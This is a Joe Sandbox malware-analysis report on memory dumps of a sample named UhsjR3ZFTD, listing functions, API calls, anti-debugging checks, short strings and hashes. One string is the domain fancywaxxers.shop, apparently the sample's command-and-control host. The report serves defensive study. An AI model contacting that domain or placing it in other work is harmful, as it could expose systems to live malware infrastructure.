Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 4935260367bbb3398feae65f36ee465ced9ca90d89c3e04461ef8a8e0cc46e7e
Instruction ID: a3fb779c51ef0d171e42a1d4165cc5294c3da53a0f1cafccb4eacd03a24c85dc
Opcode Fuzzy Hash: 4935260367bbb3398feae65f36ee465ced9ca90d89c3e04461ef8a8e0cc46e7e
Instruction Fuzzy Hash: EA21C572E08200A6DB348F95C900BD777A7EB94B60B5A8466E90ADB300E732DD41E352

Function 00419820 Relevance: 8.4, APIs: 2, Strings: 2, Instructions: 1415COMMON

Download Yara Rule

APIs

Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E

FreeLibrary.KERNEL32(?), ref: 00419E7D
FreeLibrary.KERNEL32(?), ref: 00419F1E

Strings

#v, xrefs: 00419E7D, 00419F1E
NO, xrefs: 00419CFE

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: NO$#v
API String ID: 764372645-2882766750
Opcode ID: e994bf9aca9ffad251a8e8e39955b3cd0e821797c371950e4c131b848a4e05ab
Instruction ID: abe4a73a967468b274d366e370c220422a45fd0295e639bb6f5522fed691f7b9
Opcode Fuzzy Hash: e994bf9aca9ffad251a8e8e39955b3cd0e821797c371950e4c131b848a4e05ab
Instruction Fuzzy Hash: 26924975A183419BE724CF24C890B6BBBE3ABD5304F29C82EE08587365D679DC91CB47

Function 006DA6A7 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 006DA7AF
IsValidCodePage.KERNEL32(00000000), ref: 006DA7ED
IsValidLocale.KERNEL32(?,00000001), ref: 006DA800
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 006DA848
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 006DA863

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: a8cb7187fe5466834c958249e762415544ce38f714fd44f19db98873ab0da4bc
Instruction ID: 0264bcbfcfb28a30645a1f85456cb465a9d9a15d70cd275fa20013d583c040bc
Opcode Fuzzy Hash: a8cb7187fe5466834c958249e762415544ce38f714fd44f19db98873ab0da4bc
Instruction Fuzzy Hash: 85516E75E04206AFDB50DFE4DC81AFA77BAFF08700F14456AE901EB390EB7199419B62

Function 00428F6C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 219COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428DFB
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428F3C

Strings

rM, xrefs: 00428E90
zM, xrefs: 00428E89

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: rM$zM
API String ID: 237503144-2784921869
Opcode ID: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
Instruction ID: 97ddf7a0595f55843d8ed3a5592f022fec3ca497b996ab7f20284500c0a95c28
Opcode Fuzzy Hash: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
Instruction Fuzzy Hash: D661D0F0A443219FE754CF69C991A9ABFB0FB46350F1A42ADE4459F392C3748842CBD5

Function 00426360 Relevance: 6.9, Strings: 5, Instructions: 628COMMON

Download Yara Rule

Strings

xHLG, xrefs: 004264F1, 004264F5
lmeH, xrefs: 00426454
Sin;, xrefs: 0042644C
YzW+, xrefs: 00426434
dMKP, xrefs: 00426444

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: Sin;$YzW+$dMKP$lmeH$xHLG
API String ID: 0-2485238161
Opcode ID: 53c1c3e7beeb02a5bfbe861942d4d5c87f2e832a164556a30a5f60c8f53b826b
Instruction ID: 4aad12527c045970d6953cacdb77c585329f148e38e5d38ad86dba377078a4b1
Opcode Fuzzy Hash: 53c1c3e7beeb02a5bfbe861942d4d5c87f2e832a164556a30a5f60c8f53b826b
Instruction Fuzzy Hash: 0A2255B16083918FD7109F29E85136BBBE1EF86304F09887EE5C59B381D739D906CB5A

Function 00418740 Relevance: 6.6, Strings: 5, Instructions: 346COMMON

Download Yara Rule

Strings

EFG, xrefs: 00418A13
3, xrefs: 00418A94
h2h0, xrefs: 00418768
^, xrefs: 0041884F
AC, xrefs: 00418A08

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: 3$h2h0$AC$EFG$^
API String ID: 0-608315617
Opcode ID: d53e257c2075918734cd9bcba6b5da5e0b46016a60d2228bb7ca5af722daeddf
Instruction ID: d3f7bcd23a71bb6fca4cd7d9fe77f5dce33f5e25f3cb76845b8540b24cd68cf4
Opcode Fuzzy Hash: d53e257c2075918734cd9bcba6b5da5e0b46016a60d2228bb7ca5af722daeddf
Instruction Fuzzy Hash: 6CC19EB15083918BD334CF29C4913EBBBE1EFD2314F058A2DD8D95B290EB799845CB86

Function 00408EF0 Relevance: 6.5, Strings: 5, Instructions: 259COMMON

Download Yara Rule

Strings

QmST, xrefs: 00408F94
3DJ, xrefs: 00408FB4
AH3, xrefs: 00408FBC
@DrF, xrefs: 00408FAC
geYd, xrefs: 00408F8C

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: 3DJ$@DrF$AH3$QmST$geYd
API String ID: 0-2788220846
Opcode ID: 32799a698c3d96bb907ba3f325351d66fd8decef381e36e4e78d77a0d004097b
Instruction ID: 4f858eabc2a1050b4af87be1a3efc61e7958397d893593ca31e805b38df32c69
Opcode Fuzzy Hash: 32799a698c3d96bb907ba3f325351d66fd8decef381e36e4e78d77a0d004097b
Instruction Fuzzy Hash: A051C42014D3D29AD3118F3984E039BFFE0AFA3304F18556EE8D45B386D33A891AD766

Function 006D34A0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e3378d954b4332bba990f659ed7c26a809c6bf1397c72b1adf76834141ef38
Instruction ID: c834cc8b419b4dd9201e287e4d8b2cfb8532693f29fa2e003de44d2b7d5f3269
Opcode Fuzzy Hash: a2e3378d954b4332bba990f659ed7c26a809c6bf1397c72b1adf76834141ef38
Instruction Fuzzy Hash: 60021D71E012299BDF14CFA9D8906EDFBF2FF48314F14826AE515E7340D731AA418B95

Function 006DB409 Relevance: 6.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006DB4F9

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 77d28a65d806bb0f3c6fc3bf0b387d66a7d57d34f6da1f72cbb702ec6d94be8c
Instruction ID: f0f39c5bf0c75166bcf40b63e9f7d0547b368991347a1756891ea693d85e7482
Opcode Fuzzy Hash: 77d28a65d806bb0f3c6fc3bf0b387d66a7d57d34f6da1f72cbb702ec6d94be8c
Instruction Fuzzy Hash: 3A71C071D051989FDF20EF249C89AFAB7BAEB05300F5551DEE009A7359EB318E848F58

Function 006C9AD3 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006C9ADF
IsDebuggerPresent.KERNEL32 ref: 006C9BAB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006C9BC4
UnhandledExceptionFilter.KERNEL32(?), ref: 006C9BCE

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 017f841f48c7800d22bc98802992ef81c7bcbdc1f0ce9c741b6e0017db4c07e9
Instruction ID: fe4f97ceb07a14972a51b8cf8d0f34adb6f609e96800abb75085056ff40ba68f
Opcode Fuzzy Hash: 017f841f48c7800d22bc98802992ef81c7bcbdc1f0ce9c741b6e0017db4c07e9
Instruction Fuzzy Hash: D53116B5D052189BDF60DFA4D989BDDBBB8EF08300F1041EAE40CAB250EB719A858F55

Function 00427CB0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 599COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00427DC0
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49

Strings

7e1, xrefs: 00427FFA

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 7e1
API String ID: 237503144-1127181755
Opcode ID: 1b39cba85f7465282da7a1db2dc4396b6ecffed7ed28ec75b176153d7ede6d44
Instruction ID: c73f166b7c42da4403d63bb3e24580fd4c4d4143f2e15d469fbc9f0eaa75cdd5
Opcode Fuzzy Hash: 1b39cba85f7465282da7a1db2dc4396b6ecffed7ed28ec75b176153d7ede6d44
Instruction Fuzzy Hash: DB121471E04228CFDB14CF68D8917AEB7B1FF55310F1481AED846AB382DB389946CB95

Function 00427A5A Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 561COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49

Strings

7e1, xrefs: 00427FFA
{B, xrefs: 00427BD0

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 7e1${B
API String ID: 237503144-3235371320
Opcode ID: 1d05c416a86f48728e9a28166568a4afb16117623205e21ac6177041c8dc3b66
Instruction ID: 95f0cad8862f2af99a7bb935661dc1960fd3b24764110846962f877ea0b9236a
Opcode Fuzzy Hash: 1d05c416a86f48728e9a28166568a4afb16117623205e21ac6177041c8dc3b66
Instruction Fuzzy Hash: F4021571E08224CFDB14CF68D8917AEB7B1FF95314F1481AED846AB381DB389942CB95

Function 00427B08 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 549COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49

Strings

7e1, xrefs: 00427FFA
{B, xrefs: 00427BD0

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 7e1${B
API String ID: 237503144-3235371320
Opcode ID: 6a17e22f67e02696a72774e7070fabe38b7a2f0cdbdf55b684643e6438018d23
Instruction ID: ffbaa110a31002c00b33609662cf676e3cfc5359165e1e1bb80dc834af8824ee
Opcode Fuzzy Hash: 6a17e22f67e02696a72774e7070fabe38b7a2f0cdbdf55b684643e6438018d23
Instruction Fuzzy Hash: 74023471E08224CFDB14CF64D8917AEB7B1FF95314F1481ADD846AB382DB389942CB95

Function 0041DE90 Relevance: 4.6, Strings: 3, Instructions: 867COMMON

Download Yara Rule

Strings

urz|, xrefs: 0041E57C
n~xx, xrefs: 0041E584
J, xrefs: 0041E58C

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: J$n~xx$urz|
API String ID: 0-3220001382
Opcode ID: b31e8aa4af254f48f2630a33910aa6890d488a9be7c75a24b6ff0c3cf5e54a69
Instruction ID: 6a91fd7be6a80c1624e75f382a73f26f0e074c3cb1dfdb16b98c5d7a18dbd3f0
Opcode Fuzzy Hash: b31e8aa4af254f48f2630a33910aa6890d488a9be7c75a24b6ff0c3cf5e54a69
Instruction Fuzzy Hash: 7652BB7850C3918FC725CF29C8506AFBBE1AF95314F084B6DE8E547392D7399805CB9A

Function 00417FE1 Relevance: 4.3, Strings: 3, Instructions: 580COMMON

Download Yara Rule

Strings

L4, xrefs: 004183D0
BDE:, xrefs: 00418358, 004183F2
L4, xrefs: 004180C0

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: BDE:$L4$L4
API String ID: 0-3692522541
Opcode ID: be6432e084263a3291549fe13bd0a810b6e47c040b8f48670cceb1158c16825f
Instruction ID: dd390c41524992b3b41842bda6cd178197e7fbbdd3d64fed8634c62cd5e5b5ab
Opcode Fuzzy Hash: be6432e084263a3291549fe13bd0a810b6e47c040b8f48670cceb1158c16825f
Instruction Fuzzy Hash: FF125C72A082519FD724CF28C8517AFB3E2EBD5314F19893ED48AC7351DB389841CB8A

Function 0041C3CC Relevance: 4.3, Strings: 3, Instructions: 574COMMON

Download Yara Rule

Strings

{u, xrefs: 0041C64D
:G!A, xrefs: 0041C638
Vw1q, xrefs: 0041C654

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: :G!A$Vw1q${u
API String ID: 0-645793561
Opcode ID: 5aabdbd3031ce8a4584c980d2b67a6b8cdd154d9a8e847e6682a9da6037f3857
Instruction ID: e35f9824382157240d3d87f0a1d15c17bfd725fbec35765ed2db11ef4fc98c05
Opcode Fuzzy Hash: 5aabdbd3031ce8a4584c980d2b67a6b8cdd154d9a8e847e6682a9da6037f3857
Instruction Fuzzy Hash: 6C0242B5900216CFDB14CF29C8815FBBBB2FF56310F188569E855AB342E338A991CBD5

Function 00439C70 Relevance: 4.2, Strings: 3, Instructions: 441COMMON

Download Yara Rule

Strings

`a, xrefs: 00439FF2
$0Qx, xrefs: 00439FF9
*0Qx, xrefs: 0043A021

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: $0Qx$*0Qx$`a
API String ID: 0-2354730689
Opcode ID: 7bdbeef81bf970ed795b7748677985d075231058f587ee6d2346d196102fc5af
Instruction ID: 6e7c93c0a148da01ad464f35dcf862257e7f2efdc77a60f70c0a7fadf4f8a59e
Opcode Fuzzy Hash: 7bdbeef81bf970ed795b7748677985d075231058f587ee6d2346d196102fc5af
Instruction Fuzzy Hash: D5D1243F618212CBCB188F29D86126BB3F2FF8A752F1A947DC485472A0EB789C51D745

Function 004274A5 Relevance: 4.1, Strings: 3, Instructions: 362COMMON

Download Yara Rule

Strings

QyB, xrefs: 0042794B
)yB, xrefs: 00427923
"uB, xrefs: 00427515

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: "uB$)yB$QyB
API String ID: 0-1484077961
Opcode ID: 0cd158f3e7f884d7cc2612b3f5f2fb899bdbdf91b851aaf563b828fa1a0cb41f
Instruction ID: bebb4fd51b4539f016b18d377b659452e01560476b88e099c37467506dc643be
Opcode Fuzzy Hash: 0cd158f3e7f884d7cc2612b3f5f2fb899bdbdf91b851aaf563b828fa1a0cb41f
Instruction Fuzzy Hash: 75D12676A0C351CFD714CF28D85131ABBE2AF86314F0989ADE4959B3A1D738ED41CB86

Function 00414777 Relevance: 3.9, Strings: 3, Instructions: 188COMMON

Download Yara Rule

Strings

rIA, xrefs: 00414965
>MA, xrefs: 0041495F
]k, xrefs: 004147DA

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: >MA$]k$rIA
API String ID: 0-1646247225
Opcode ID: 4b84b9957e39165ea7d9a40e7597085d8ffd6de602ec7e9299e06c7fe6263af9
Instruction ID: 7dcd1ab1f66cc66079ed29567c30894e9083a3f88b64816671fdba32d81f215f
Opcode Fuzzy Hash: 4b84b9957e39165ea7d9a40e7597085d8ffd6de602ec7e9299e06c7fe6263af9
Instruction Fuzzy Hash: 604158B6A4836286D718CF24E8513A7B3E2EFE5314F19443ED88597781F7788C41C39A

Function 00424974 Relevance: 3.2, Strings: 2, Instructions: 715COMMON

Download Yara Rule

Strings

`ibc, xrefs: 004249B5, 004249CC, 00424A38, 00424A48
PB, xrefs: 004250C6

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: `ibc$PB
API String ID: 0-1987769102
Opcode ID: d32b6d52973716b9b8f624e63cd3b121906dd60e876f8ca9943aac46229fb155
Instruction ID: d7af6ebc4ec7fa9aafc34c7092b5181dfb32356bb0cb9250f61f6585be71885b
Opcode Fuzzy Hash: d32b6d52973716b9b8f624e63cd3b121906dd60e876f8ca9943aac46229fb155
Instruction Fuzzy Hash: 862237366183258BC324DF39DC412ABB7E2EFD5314F59893EE891D7390E77899018B89

Function 0043C510 Relevance: 3.2, Strings: 2, Instructions: 701COMMON

Download Yara Rule

Strings

f, xrefs: 0043C7A5
xHLG, xrefs: 0043C512

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID: f$xHLG
API String ID: 2994545307-1062749201
Opcode ID: 77443ad40c4b36c6312108abeefb89fcdfb2d5b0b0c44719c05ba49af7009652
Instruction ID: d2651cdac37472708b43d0abb75bf2b64163b131a76c60ca99435b560db9f8b9
Opcode Fuzzy Hash: 77443ad40c4b36c6312108abeefb89fcdfb2d5b0b0c44719c05ba49af7009652
Instruction Fuzzy Hash: 092215756483418FD314CF24C8C172BB7E2ABC9314F19A93EE585A7392D679DC418B8A

Function 00426340 Relevance: 3.2, Strings: 2, Instructions: 688COMMON

Download Yara Rule

Strings

ur, xrefs: 00426B69
H/'&, xrefs: 00426EC5, 00426EE6, 00426EF1

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: H/'&$ur
API String ID: 0-969745386
Opcode ID: 51efef133e5380bce4855441df71492e31b3e02de5526c91accd09cc34948ed6
Instruction ID: 443a563da7a5e4d6bc490b1340c0ec2082c34ead57a9a2c43d9228df9cd59d8b
Opcode Fuzzy Hash: 51efef133e5380bce4855441df71492e31b3e02de5526c91accd09cc34948ed6
Instruction Fuzzy Hash: 99322776B083608BD728CF29D85176BB7E2EBC5314F09857DE8899B391DB749C01C78A

Function 00414DC0 Relevance: 3.0, Strings: 2, Instructions: 530COMMON

Download Yara Rule

Strings

b, xrefs: 004153B1
30, xrefs: 004153DD

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: 30$b
API String ID: 0-3051719697
Opcode ID: c2aa87826391c1a0d2a88bebae714568fb9ab9cc3dd3931598e1d3df11044c82
Instruction ID: 9d6171b0f8d729934fe615063e41a7396b25218e269f5ca015a4c9f4117884d8
Opcode Fuzzy Hash: c2aa87826391c1a0d2a88bebae714568fb9ab9cc3dd3931598e1d3df11044c82
Instruction Fuzzy Hash: D4F134B5949340CBD724DF24C851BEBB3B1EFD5354F098A2EE48A4B391E7385841CB8A

Function 0040C6F0 Relevance: 3.0, Strings: 2, Instructions: 519COMMON

Download Yara Rule

Strings

fancywaxxers.shop, xrefs: 0040CAAE, 0040CE42
~|, xrefs: 0040CD42

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: fancywaxxers.shop$~|
API String ID: 0-1994482202
Opcode ID: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
Instruction ID: 07f789514de0362c9278d2f25248cc3fff6a0dc72d81a8c8c11c8a6f1e2f7610
Opcode Fuzzy Hash: 2ea1ef0a15a67f7fdda1a48f7da9eae60188067ef9178f3af6fbfe1279a511b7
Instruction Fuzzy Hash: 9902DEB114D3C18AD735CF25D4907EFBBE0EB96304F188A6DC4D96B252C3794906CB9A

Function 00416C90 Relevance: 2.7, Strings: 2, Instructions: 196COMMON

Download Yara Rule

Strings

qN, xrefs: 00416E93
0v9t, xrefs: 00416DB4

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: 0v9t$qN
API String ID: 0-941405136
Opcode ID: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
Instruction ID: 220aa0fee5a4e2dc26cf1b999887b7bccb6aee529e7354faf9f9a8d1f9f2e198
Opcode Fuzzy Hash: bc23a0605ba581f5919c4a1466ab1a22bb73885292ae361fd8e0853229d8ee67
Instruction Fuzzy Hash: 495147766053114BC7248A24C8917EF7693DBC1328F1B4A2DD8E59B3D2DB3DD84693CA

Function 0043E262 Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

MVWT, xrefs: 0043E28A
@, xrefs: 0043E392

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: @$MVWT
API String ID: 0-308850327
Opcode ID: edd61951c65c48e89f330cffe8bc18b6ebc55625f6946b0225634a536ad9881b
Instruction ID: 65c5c0bd10fcc527816f4646fa5217bc89ccf3aa808f0d29d6591c7bb2e007d1
Opcode Fuzzy Hash: edd61951c65c48e89f330cffe8bc18b6ebc55625f6946b0225634a536ad9881b
Instruction Fuzzy Hash: D54113765193418BE704CF26C45036BB7E2EFDA305F59682ED4C2AB394DB7C8906CB4A

Function 0043E850 Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

siOk, xrefs: 0043E9D5
siOk, xrefs: 0043E8FD

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: siOk$siOk
API String ID: 0-2545891108
Opcode ID: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
Instruction ID: 3c122c9db7ae0a256ae9501e17b53326d689da9f2a67ac00692780b2415a66a0
Opcode Fuzzy Hash: 4047de749646bd4952ae1885a03256a8ceda6498f8615743bc9d98962fb15324
Instruction Fuzzy Hash: AB21052951DAA04BCB36CB3D44D463EBBE65F97110B08897DDCE2C73CAC5249800D765

Function 0042C1A3 Relevance: 2.6, Strings: 2, Instructions: 63COMMON

Download Yara Rule

Strings

